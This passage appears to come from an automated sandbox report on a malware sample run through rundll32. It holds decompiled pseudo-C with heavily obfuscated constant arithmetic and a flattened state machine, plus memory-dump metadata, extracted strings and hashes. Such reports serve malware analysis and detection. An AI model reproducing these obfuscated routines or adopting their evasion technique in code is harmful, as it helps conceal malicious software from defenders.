                                                                                                                      				_v264 = _v264 * 0x6c;
                                                                                                                      				_v264 = _v264 * 0x28;
                                                                                                                      				_v264 = _v264 ^ 0x0fadceb8;
                                                                                                                      				_v184 = 0x6ad0e5;
                                                                                                                      				_v184 = _v184 / _t908;
                                                                                                                      				_t909 = 0x32;
                                                                                                                      				_v184 = _v184 * 0x5e;
                                                                                                                      				_v184 = _v184 ^ 0x009cabd8;
                                                                                                                      				_v84 = 0x5866f1;
                                                                                                                      				_v84 = _v84 / _t909;
                                                                                                                      				_v84 = _v84 ^ 0x000cf4a6;
                                                                                                                      				_v256 = 0xa194b;
                                                                                                                      				_v256 = _v256 ^ 0x94dec7ad;
                                                                                                                      				_t910 = 0x46;
                                                                                                                      				_v256 = _v256 / _t910;
                                                                                                                      				_v256 = _v256 >> 0x10;
                                                                                                                      				_v256 = _v256 ^ 0x000f9e72;
                                                                                                                      				_v76 = 0x8e9e60;
                                                                                                                      				_v76 = _v76 + 0xffff51c3;
                                                                                                                      				_v76 = _v76 ^ 0x0088247f;
                                                                                                                      				_v224 = 0x83ac61;
                                                                                                                      				_t911 = 0x3d;
                                                                                                                      				_v224 = _v224 * 0x1d;
                                                                                                                      				_v224 = _v224 << 0xc;
                                                                                                                      				_v224 = _v224 | 0x2dac99f4;
                                                                                                                      				_v224 = _v224 ^ 0xade893a0;
                                                                                                                      				_v32 = 0x13495a;
                                                                                                                      				_v32 = _v32 + 0x5cab;
                                                                                                                      				_v32 = _v32 ^ 0x001eeb0b;
                                                                                                                      				_v136 = 0x5c94f5;
                                                                                                                      				_v136 = _v136 + 0xffff9353;
                                                                                                                      				_v136 = _v136 * 0x44;
                                                                                                                      				_v136 = _v136 ^ 0x187702f3;
                                                                                                                      				_v176 = 0x8546fa;
                                                                                                                      				_v176 = _v176 ^ 0x1d3e4f45;
                                                                                                                      				_v176 = _v176 << 4;
                                                                                                                      				_v176 = _v176 ^ 0xdbb17ead;
                                                                                                                      				_v56 = 0x621504;
                                                                                                                      				_v56 = _v56 + 0x6ed1;
                                                                                                                      				_v56 = _v56 ^ 0x006a4e76;
                                                                                                                      				_v244 = 0x9c5408;
                                                                                                                      				_v244 = _v244 | 0xf9568eed;
                                                                                                                      				_v244 = _v244 + 0x5010;
                                                                                                                      				_v244 = _v244 / _t911;
                                                                                                                      				_v244 = _v244 ^ 0x041668c2;
                                                                                                                      				_v252 = 0xb42276;
                                                                                                                      				_v252 = _v252 + 0xa961;
                                                                                                                      				_v252 = _v252 + 0xdc70;
                                                                                                                      				_v252 = _v252 ^ 0x05685821;
                                                                                                                      				_v252 = _v252 ^ 0x05d7e4aa;
                                                                                                                      				_v260 = 0xd51767;
                                                                                                                      				_v260 = _v260 * 0x31;
                                                                                                                      				_v260 = _v260 << 0xc;
                                                                                                                      				_v260 = _v260 << 0xf;
                                                                                                                      				_v260 = _v260 ^ 0xb80dad1b;
                                                                                                                      				_v280 = 0xeb0bae;
                                                                                                                      				_v280 = _v280 | 0x0e7dba98;
                                                                                                                      				_v280 = _v280 << 6;
                                                                                                                      				_t912 = 0x26;
                                                                                                                      				_v280 = _v280 / _t912;
                                                                                                                      				_v280 = _v280 ^ 0x050e5033;
                                                                                                                      				_v188 = 0x4bf18;
                                                                                                                      				_v188 = _v188 * 0x2e;
                                                                                                                      				_v188 = _v188 | 0xf176dffe;
                                                                                                                      				_v188 = _v188 ^ 0xf1f57857;
                                                                                                                      				_v96 = 0x6c4fa9;
                                                                                                                      				_v96 = _v96 + 0x1fcf;
                                                                                                                      				_v96 = _v96 ^ 0x00693444;
                                                                                                                      				_v148 = 0xfd06aa;
                                                                                                                      				_v148 = _v148 >> 1;
                                                                                                                      				_v148 = _v148 << 0xc;
                                                                                                                      				_v148 = _v148 ^ 0xe83e1d17;
                                                                                                                      				_v156 = 0xd0b75a;
                                                                                                                      				_v156 = _v156 + 0xffff0c56;
                                                                                                                      				_v156 = _v156 * 0x3c;
                                                                                                                      				_v156 = _v156 ^ 0x30b9846f;
                                                                                                                      				_v288 = 0xd0c6e5;
                                                                                                                      				_v288 = _v288 >> 0xc;
                                                                                                                      				_v288 = _v288 ^ 0x0000ba9d;
                                                                                                                      				_v292 = 0x631535;
                                                                                                                      				_v292 = _v292 >> 8;
                                                                                                                      				_v292 = _v292 * 0x1e;
                                                                                                                      				_v292 = _v292 ^ 0x000d3f85;
                                                                                                                      				_v296 = 0x662a0d;
                                                                                                                      				_v296 = _v296 + 0x95ba;
                                                                                                                      				_v296 = _v296 >> 7;
                                                                                                                      				_v296 = _v296 ^ 0xe8c154cb;
                                                                                                                      				_v296 = _v296 ^ 0xe8c95b3b;
                                                                                                                      				_v140 = 0x555820;
                                                                                                                      				_v140 = _v140 << 4;
                                                                                                                      				_v140 = _v140 | 0xc7d2a78c;
                                                                                                                      				_v140 = _v140 ^ 0xc7df0fda;
                                                                                                                      				_t913 = _v20;
                                                                                                                      				_t921 = _v20;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						_t784 = _v236;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t925 = _t914 - 0x83eeb0d;
                                                                                                                      							if(_t925 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0x969dc48;
                                                                                                                      							if(_t914 == 0x969dc48) {
                                                                                                                      								E00190411(_t784, _v148, _v156, _v288);
                                                                                                                      								_t914 = 0x7ec14ff;
                                                                                                                      								L40:
                                                                                                                      								_t829 = _a24;
                                                                                                                      								_t884 = 0x3d0a345;
                                                                                                                      								L41:
                                                                                                                      								__eflags = _t914 - 0xa326727;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									L11:
                                                                                                                      									return _t827;
                                                                                                                      								}
                                                                                                                      								_t784 = _v236;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0x9d261fa;
                                                                                                                      							if(_t914 == 0x9d261fa) {
                                                                                                                      								_t833 =  *_t829;
                                                                                                                      								__eflags = _t833;
                                                                                                                      								if(_t833 == 0) {
                                                                                                                      									_t787 = 0;
                                                                                                                      									__eflags = 0;
                                                                                                                      								} else {
                                                                                                                      									_t787 = _a24[1];
                                                                                                                      								}
                                                                                                                      								E0018BD01(_v56, _t913, _t833, _v244, _v252, _t787, _v260, _a20);
                                                                                                                      								_t923 =  &(_t923[7]);
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t914 = (_t914 & 0xf886a69e) + 0xe7d57af;
                                                                                                                      								L13:
                                                                                                                      								_t829 = _a24;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xd1f742e;
                                                                                                                      							if(_t914 == 0xd1f742e) {
                                                                                                                      								_push(_t829);
                                                                                                                      								_t791 = E001890DB(_v72, _t829, _v268, _t829, _v276, _v80, _v88);
                                                                                                                      								_t921 = _t791;
                                                                                                                      								__eflags = _t791;
                                                                                                                       								_t914 = (_t791 != 0) ? 0x266034b : 0xa326727;
                                                                                                                      								E001768DE(_v164, _v172, _v208, _v64, 0);
                                                                                                                      								_t923 =  &(_t923[0xa]);
                                                                                                                      								goto L40;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xe7d57af;
                                                                                                                      							if(_t914 == 0xe7d57af) {
                                                                                                                      								_t703 =  &_v96; // 0x693444
                                                                                                                      								E00190411(_t913, _v280, _v188,  *_t703);
                                                                                                                      								L33:
                                                                                                                      								_t914 = 0x969dc48;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      							__eflags = _t914 - 0xef78d61;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L41;
                                                                                                                      							}
                                                                                                                      							_t914 = 0xd1f742e;
                                                                                                                      						}
                                                                                                                      						if(_t925 == 0) {
                                                                                                                      							_t914 = 0xef78d61;
                                                                                                                      							goto L3;
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0xb94cb2) {
                                                                                                                      							__eflags = E00190867(_t913, _a28);
                                                                                                                      							_t914 = 0xe7d57af;
                                                                                                                      							_t797 = 1;
                                                                                                                      							_t827 =  !=  ? _t797 : _t827;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0x266034b) {
                                                                                                                      							_t695 =  &_v112; // 0x306e5b
                                                                                                                      							_t784 = E001800A0(_t921, _t829, _t829, _v248, _v196, _t829, _v104, _a36,  *_t695, _v284, _v204, _v116, _v144, _a4);
                                                                                                                      							_t829 = _a24;
                                                                                                                      							_t923 =  &(_t923[0xd]);
                                                                                                                      							__eflags = _t784;
                                                                                                                      							_v236 = _t784;
                                                                                                                      							_t884 = 0x3d0a345;
                                                                                                                      							_t914 =  !=  ? 0x3d0a345 : 0x7ec14ff;
                                                                                                                      							goto L3;
                                                                                                                      						}
                                                                                                                      						if(_t914 == _t884) {
                                                                                                                      							__eflags =  *_t829;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t841 = _v24;
                                                                                                                      							} else {
                                                                                                                      								_push(_v132);
                                                                                                                      								_push(_v200);
                                                                                                                      								_push(0x1712fc);
                                                                                                                      								_t841 = E0017AB66(_v228, _v232, __eflags);
                                                                                                                      								_t923 =  &(_t923[3]);
                                                                                                                      								_v24 = _t841;
                                                                                                                      							}
                                                                                                                      							_t657 =  &_v100; // 0xe65150
                                                                                                                      							_t807 = _v40 | _v48 | _v60 | _v212 | _v124 | _v108 | _v216 | _v120 |  *_t657;
                                                                                                                      							_t919 = _v12 & 1;
                                                                                                                      							__eflags = _t919;
                                                                                                                      							if(_t919 != 0) {
                                                                                                                      								__eflags = _t807;
                                                                                                                      							}
                                                                                                                      							_push(_t841);
                                                                                                                      							_t808 = E00190349(_t841, _v240, _v16, _t841, _t841, _v192, _v272, _t807, _v236, _t841, _v52, _v160);
                                                                                                                      							_t913 = _t808;
                                                                                                                      							E0017AE03(_v36, _v92, _v128, _v24);
                                                                                                                      							_t923 =  &(_t923[0xd]);
                                                                                                                      							__eflags = _t808;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								goto L33;
                                                                                                                      							} else {
                                                                                                                      								_v68 = 1;
                                                                                                                      								E0017B6D1(_v44, _v264, _v184, 4, _v84,  &_v68, _t913);
                                                                                                                      								_t923 =  &(_t923[5]);
                                                                                                                      								__eflags = _t919;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									E001775A5(_t913, _v256, _v152, _v76, _v224,  &_v68,  &_v20);
                                                                                                                      									_t682 =  &_v68;
                                                                                                                      									 *_t682 = _v68 | _v28;
                                                                                                                      									__eflags =  *_t682;
                                                                                                                      									E0017B6D1(_v168, _v32, _v136, _v20, _v176,  &_v68, _t913);
                                                                                                                      									_t923 =  &(_t923[0xa]);
                                                                                                                      								}
                                                                                                                      								_t914 = 0x9d261fa;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0x703fe4d) {
                                                                                                                      							__eflags = E001784B8(_t913, _v220, __eflags) - _v180;
                                                                                                                      							_t914 =  ==  ? 0xb94cb2 : 0xe7d57af;
                                                                                                                      							__eflags = 0xe7d57af;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t914 != 0x7ec14ff) {
                                                                                                                      							goto L41;
                                                                                                                      						}
                                                                                                                      						E00190411(_t921, _v292, _v296, _v140);
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0018810f
                                                                                                                      0x00188117
                                                                                                                      0x00188122
                                                                                                                      0x0018812d
                                                                                                                      0x00188138
                                                                                                                      0x00188143
                                                                                                                      0x0018814b
                                                                                                                      0x00188156
                                                                                                                      0x00188161
                                                                                                                      0x00188169
                                                                                                                      0x00188170
                                                                                                                      0x00188178
                                                                                                                      0x0018817f
                                                                                                                      0x0018818a
                                                                                                                      0x0018819e
                                                                                                                      0x001881a5
                                                                                                                      0x001881b0
                                                                                                                      0x001881bb
                                                                                                                      0x001881c3
                                                                                                                      0x001881c8
                                                                                                                      0x001881d0
                                                                                                                      0x001881d8
                                                                                                                      0x001881e3
                                                                                                                      0x001881eb
                                                                                                                      0x001881f6
                                                                                                                      0x001881fe
                                                                                                                      0x00188206
                                                                                                                      0x0018820e
                                                                                                                      0x00188216
                                                                                                                      0x0018821e
                                                                                                                      0x00188226
                                                                                                                      0x0018822e
                                                                                                                      0x00188233
                                                                                                                      0x0018823b
                                                                                                                      0x00188246
                                                                                                                      0x00188250
                                                                                                                      0x0018825b
                                                                                                                      0x00188270
                                                                                                                      0x00188271
                                                                                                                      0x00188278
                                                                                                                      0x00188283
                                                                                                                      0x00188290
                                                                                                                      0x00188294
                                                                                                                      0x00188299
                                                                                                                      0x0018829e
                                                                                                                      0x001882a6
                                                                                                                      0x001882ae
                                                                                                                      0x001882b6
                                                                                                                      0x001882be
                                                                                                                      0x001882c6
                                                                                                                      0x001882d1
                                                                                                                      0x001882d9
                                                                                                                      0x001882e4
                                                                                                                      0x001882ef
                                                                                                                      0x001882fc
                                                                                                                      0x00188300
                                                                                                                      0x00188308
                                                                                                                      0x00188310
                                                                                                                      0x00188318
                                                                                                                      0x00188320
                                                                                                                      0x00188328
                                                                                                                      0x0018832d
                                                                                                                      0x00188335
                                                                                                                      0x0018833d
                                                                                                                      0x00188345
                                                                                                                      0x0018834a
                                                                                                                      0x00188352
                                                                                                                      0x0018835a
                                                                                                                      0x0018836d
                                                                                                                      0x00188374
                                                                                                                      0x0018837c
                                                                                                                      0x00188387
                                                                                                                      0x0018838f
                                                                                                                      0x00188397
                                                                                                                      0x0018839f
                                                                                                                      0x001883a7
                                                                                                                      0x001883af
                                                                                                                      0x001883bc
                                                                                                                      0x001883c5
                                                                                                                      0x001883c9
                                                                                                                      0x001883d1
                                                                                                                      0x001883d9
                                                                                                                      0x001883e1
                                                                                                                      0x001883e9
                                                                                                                      0x001883f1
                                                                                                                      0x001883f9
                                                                                                                      0x00188404
                                                                                                                      0x0018840c
                                                                                                                      0x00188417
                                                                                                                      0x00188422
                                                                                                                      0x00188435
                                                                                                                      0x0018843c
                                                                                                                      0x00188447
                                                                                                                      0x00188452
                                                                                                                      0x0018845a
                                                                                                                      0x00188465
                                                                                                                      0x00188470
                                                                                                                      0x0018847b
                                                                                                                      0x00188486
                                                                                                                      0x00188499
                                                                                                                      0x001884a0
                                                                                                                      0x001884a8
                                                                                                                      0x001884b3
                                                                                                                      0x001884c1
                                                                                                                      0x001884ce
                                                                                                                      0x001884d1
                                                                                                                      0x001884da
                                                                                                                      0x001884de
                                                                                                                      0x001884e6
                                                                                                                      0x001884fc
                                                                                                                      0x0018850b
                                                                                                                      0x0018850e
                                                                                                                      0x00188515
                                                                                                                      0x00188520
                                                                                                                      0x00188536
                                                                                                                      0x0018853d
                                                                                                                      0x00188548
                                                                                                                      0x00188550
                                                                                                                      0x0018855c
                                                                                                                      0x00188561
                                                                                                                      0x00188567
                                                                                                                      0x0018856c
                                                                                                                      0x00188574
                                                                                                                      0x0018857f
                                                                                                                      0x0018858a
                                                                                                                      0x00188595
                                                                                                                      0x001885a2
                                                                                                                      0x001885a3
                                                                                                                      0x001885a7
                                                                                                                      0x001885ac
                                                                                                                      0x001885b4
                                                                                                                      0x001885bc
                                                                                                                      0x001885c7
                                                                                                                      0x001885d2
                                                                                                                      0x001885dd
                                                                                                                      0x001885e8
                                                                                                                      0x001885fb
                                                                                                                      0x00188602
                                                                                                                      0x0018860d
                                                                                                                      0x00188618
                                                                                                                      0x00188623
                                                                                                                      0x0018862b
                                                                                                                      0x00188636
                                                                                                                      0x00188641
                                                                                                                      0x0018864c
                                                                                                                      0x00188657
                                                                                                                      0x0018865f
                                                                                                                      0x00188667
                                                                                                                      0x00188675
                                                                                                                      0x00188679
                                                                                                                      0x00188681
                                                                                                                      0x00188689
                                                                                                                      0x00188691
                                                                                                                      0x00188699
                                                                                                                      0x001886a1
                                                                                                                      0x001886a9
                                                                                                                      0x001886b6
                                                                                                                      0x001886ba
                                                                                                                      0x001886bf
                                                                                                                      0x001886c4
                                                                                                                      0x001886cc
                                                                                                                      0x001886d4
                                                                                                                      0x001886dc
                                                                                                                      0x001886e9
                                                                                                                      0x001886ec
                                                                                                                      0x001886f0
                                                                                                                      0x001886f8
                                                                                                                      0x00188705
                                                                                                                      0x00188709
                                                                                                                      0x00188711
                                                                                                                      0x00188719
                                                                                                                      0x00188724
                                                                                                                      0x0018872f
                                                                                                                      0x0018873a
                                                                                                                      0x00188745
                                                                                                                      0x0018874c
                                                                                                                      0x00188754
                                                                                                                      0x0018875f
                                                                                                                      0x0018876a
                                                                                                                      0x0018877d
                                                                                                                      0x00188784
                                                                                                                      0x0018878f
                                                                                                                      0x00188797
                                                                                                                      0x0018879c
                                                                                                                      0x001887a4
                                                                                                                      0x001887ac
                                                                                                                      0x001887b6
                                                                                                                      0x001887ba
                                                                                                                      0x001887c2
                                                                                                                      0x001887ca
                                                                                                                      0x001887d2
                                                                                                                      0x001887d7
                                                                                                                      0x001887df
                                                                                                                      0x001887e7
                                                                                                                      0x001887f2
                                                                                                                      0x001887fa
                                                                                                                      0x00188805
                                                                                                                      0x00188810
                                                                                                                      0x00188817
                                                                                                                      0x0018881e
                                                                                                                      0x0018881e
                                                                                                                      0x00188823
                                                                                                                      0x00188823
                                                                                                                      0x00188827
                                                                                                                      0x00188827
                                                                                                                      0x00188827
                                                                                                                      0x0018882d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00188ae9
                                                                                                                      0x00188aef
                                                                                                                      0x00188c0c
                                                                                                                      0x00188c13
                                                                                                                      0x00188c18
                                                                                                                      0x00188c18
                                                                                                                      0x00188c1f
                                                                                                                      0x00188c24

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *f$ XU$"f$'g2$'g2$*^b$+81$D4iPQ$Jb$M#_8$PQ$[n0D4iPQ$a+$lu$pg[$vNj$wrz$r/$?n
                                                                                                                      • API String ID: 0-930466666
                                                                                                                      • Opcode ID: 4a90b446259e682a29ab986ae5e44a7484e82fb05ee948cb5da582645d149cba
                                                                                                                      • Instruction ID: 21a2b70a97cf1a18f67d343ca449fa8791e378c6c74ca4f1953bc3b16f2df081
                                                                                                                      • Opcode Fuzzy Hash: 4a90b446259e682a29ab986ae5e44a7484e82fb05ee948cb5da582645d149cba
                                                                                                                      • Instruction Fuzzy Hash: B08200B15093818FD3B9CF25D54AA8FBBE2BBC4708F10891DE1DA96260D7B08949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0017CFCE(intOrPtr __ecx) {
                                                                                                                      				char _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				char* _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				char _v68;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				char _v76;
                                                                                                                      				char _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				unsigned int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				void* _t878;
                                                                                                                      				intOrPtr _t883;
                                                                                                                      				intOrPtr _t885;
                                                                                                                      				void* _t887;
                                                                                                                      				void* _t891;
                                                                                                                      				void* _t897;
                                                                                                                      				intOrPtr _t905;
                                                                                                                      				intOrPtr _t911;
                                                                                                                      				intOrPtr _t912;
                                                                                                                      				void* _t913;
                                                                                                                      				signed int _t915;
                                                                                                                      				char _t918;
                                                                                                                      				void* _t927;
                                                                                                                      				signed int _t933;
                                                                                                                      				signed int _t934;
                                                                                                                      				signed int _t935;
                                                                                                                      				signed int _t936;
                                                                                                                      				signed int _t937;
                                                                                                                      				signed int _t938;
                                                                                                                      				signed int _t939;
                                                                                                                      				signed int _t940;
                                                                                                                      				signed int _t941;
                                                                                                                      				signed int _t942;
                                                                                                                      				signed int _t943;
                                                                                                                      				signed int _t944;
                                                                                                                      				signed int _t945;
                                                                                                                      				signed int _t946;
                                                                                                                      				signed int _t947;
                                                                                                                      				signed int _t948;
                                                                                                                      				signed int _t949;
                                                                                                                      				void* _t950;
                                                                                                                      				intOrPtr _t967;
                                                                                                                      				intOrPtr _t971;
                                                                                                                      				void* _t1030;
                                                                                                                      				intOrPtr _t1032;
                                                                                                                      				intOrPtr _t1036;
                                                                                                                      				signed int _t1052;
                                                                                                                      				void* _t1053;
                                                                                                                      				intOrPtr _t1055;
                                                                                                                      				signed int _t1056;
                                                                                                                      				signed int _t1057;
                                                                                                                      				void* _t1058;
                                                                                                                      				void* _t1063;
                                                                                                                      				signed int* _t1065;
                                                                                                                      				void* _t1070;
                                                                                                                      
                                                                                                                      				_t1065 =  &_v428;
                                                                                                                      				_v368 = 0xff2aef;
                                                                                                                      				_v368 = _v368 ^ 0x94d7aa8a;
                                                                                                                      				_v72 = __ecx;
                                                                                                                      				_t1063 = 0;
                                                                                                                      				_t933 = 0x71;
                                                                                                                      				_v368 = _v368 / _t933;
                                                                                                                      				_v368 = _v368 >> 0x10;
                                                                                                                      				_t927 = 0xe23336a;
                                                                                                                      				_v368 = _v368 ^ 0x4d424504;
                                                                                                                      				_v360 = 0xd1872;
                                                                                                                      				_v360 = _v360 >> 1;
                                                                                                                      				_v360 = _v360 ^ 0xf196af6a;
                                                                                                                      				_v360 = _v360 >> 2;
                                                                                                                      				_v360 = _v360 ^ 0x3c6408d5;
                                                                                                                      				_v176 = 0xb206d0;
                                                                                                                      				_t934 = 0x55;
                                                                                                                      				_v176 = _v176 * 0x7f;
                                                                                                                      				_v176 = _v176 ^ 0x58516130;
                                                                                                                      				_v128 = 0x74c3bb;
                                                                                                                      				_v128 = _v128 ^ 0x08cc5173;
                                                                                                                      				_v128 = _v128 ^ 0x08b892c8;
                                                                                                                      				_v324 = 0x9db377;
                                                                                                                      				_t935 = 0x54;
                                                                                                                      				_v324 = _v324 / _t934;
                                                                                                                      				_v324 = _v324 >> 9;
                                                                                                                      				_v324 = _v324 ^ 0x000000ed;
                                                                                                                      				_v112 = 0x5e8d48;
                                                                                                                      				_v112 = _v112 / _t935;
                                                                                                                      				_v112 = _v112 ^ 0x00012028;
                                                                                                                      				_v224 = 0x5fd119;
                                                                                                                      				_v224 = _v224 | 0x5d78ffc1;
                                                                                                                      				_v224 = _v224 ^ 0x83601dcb;
                                                                                                                      				_v224 = _v224 ^ 0xde1fe212;
                                                                                                                      				_v284 = 0x3ef093;
                                                                                                                      				_t1056 = 0x2f;
                                                                                                                      				_v284 = _v284 * 0x78;
                                                                                                                      				_v284 = _v284 ^ 0x8f55145b;
                                                                                                                      				_v284 = _v284 ^ 0x92d5d0b3;
                                                                                                                      				_v384 = 0xed432;
                                                                                                                      				_v384 = _v384 << 5;
                                                                                                                      				_v384 = _v384 | 0x363f046e;
                                                                                                                      				_v384 = _v384 + 0xffff62d1;
                                                                                                                      				_v384 = _v384 ^ 0x37fee93f;
                                                                                                                      				_v140 = 0x433cbb;
                                                                                                                      				_v140 = _v140 + 0xffffaad9;
                                                                                                                      				_v140 = _v140 ^ 0x0042e794;
                                                                                                                      				_v336 = 0xcb983b;
                                                                                                                      				_v336 = _v336 >> 1;
                                                                                                                      				_v336 = _v336 << 4;
                                                                                                                      				_v336 = _v336 | 0x18349d49;
                                                                                                                      				_v336 = _v336 ^ 0x1e7cddd9;
                                                                                                                      				_v116 = 0xdf1b2;
                                                                                                                      				_v116 = _v116 | 0x5d84461c;
                                                                                                                      				_v116 = _v116 ^ 0x5d8df7be;
                                                                                                                      				_v352 = 0x1a6928;
                                                                                                                      				_v352 = _v352 + 0xb4e6;
                                                                                                                      				_v352 = _v352 + 0xd244;
                                                                                                                      				_v352 = _v352 + 0xffffe4cf;
                                                                                                                      				_v352 = _v352 ^ 0x001bd501;
                                                                                                                      				_v216 = 0x4eea53;
                                                                                                                      				_v216 = _v216 / _t1056;
                                                                                                                      				_v216 = _v216 + 0xffff2d58;
                                                                                                                      				_v216 = _v216 ^ 0x000cf508;
                                                                                                                      				_v136 = 0xd4127c;
                                                                                                                      				_t936 = 0xd;
                                                                                                                      				_v136 = _v136 * 0x71;
                                                                                                                      				_v136 = _v136 ^ 0x5d98049d;
                                                                                                                      				_v84 = 0x5dec0;
                                                                                                                      				_v84 = _v84 + 0xffff1ffb;
                                                                                                                      				_v84 = _v84 ^ 0x00030d01;
                                                                                                                      				_v144 = 0x51c367;
                                                                                                                      				_v144 = _v144 | 0x0242a62f;
                                                                                                                      				_v144 = _v144 ^ 0x025bd945;
                                                                                                                      				_v232 = 0x88ff65;
                                                                                                                      				_v232 = _v232 >> 3;
                                                                                                                      				_v232 = _v232 ^ 0xa25d5547;
                                                                                                                      				_v232 = _v232 ^ 0xa24a7ec6;
                                                                                                                      				_v272 = 0xc81b6f;
                                                                                                                      				_v272 = _v272 | 0x487ad3f8;
                                                                                                                      				_v272 = _v272 ^ 0xba29c57d;
                                                                                                                      				_v272 = _v272 ^ 0xf2d9b36a;
                                                                                                                      				_v348 = 0xc83c7a;
                                                                                                                      				_v348 = _v348 ^ 0xff1a377f;
                                                                                                                      				_v348 = _v348 << 6;
                                                                                                                      				_v348 = _v348 ^ 0x4baa6a66;
                                                                                                                      				_v348 = _v348 ^ 0xbf2398db;
                                                                                                                      				_v388 = 0x1aaad9;
                                                                                                                      				_v388 = _v388 >> 0xf;
                                                                                                                      				_v388 = _v388 * 0x2b;
                                                                                                                      				_v388 = _v388 | 0xe773ca21;
                                                                                                                      				_v388 = _v388 ^ 0xe773499c;
                                                                                                                      				_v200 = 0x8f1511;
                                                                                                                      				_v200 = _v200 + 0x4dd0;
                                                                                                                      				_v200 = _v200 ^ 0xe54041ed;
                                                                                                                      				_v200 = _v200 ^ 0xe5c111e7;
                                                                                                                      				_v264 = 0x8d8e04;
                                                                                                                      				_v264 = _v264 / _t936;
                                                                                                                      				_t937 = 0x4c;
                                                                                                                      				_v264 = _v264 * 0x55;
                                                                                                                      				_v264 = _v264 ^ 0x039811bf;
                                                                                                                      				_v96 = 0xdcd85e;
                                                                                                                      				_v96 = _v96 / _t937;
                                                                                                                      				_v96 = _v96 ^ 0x000f7a5c;
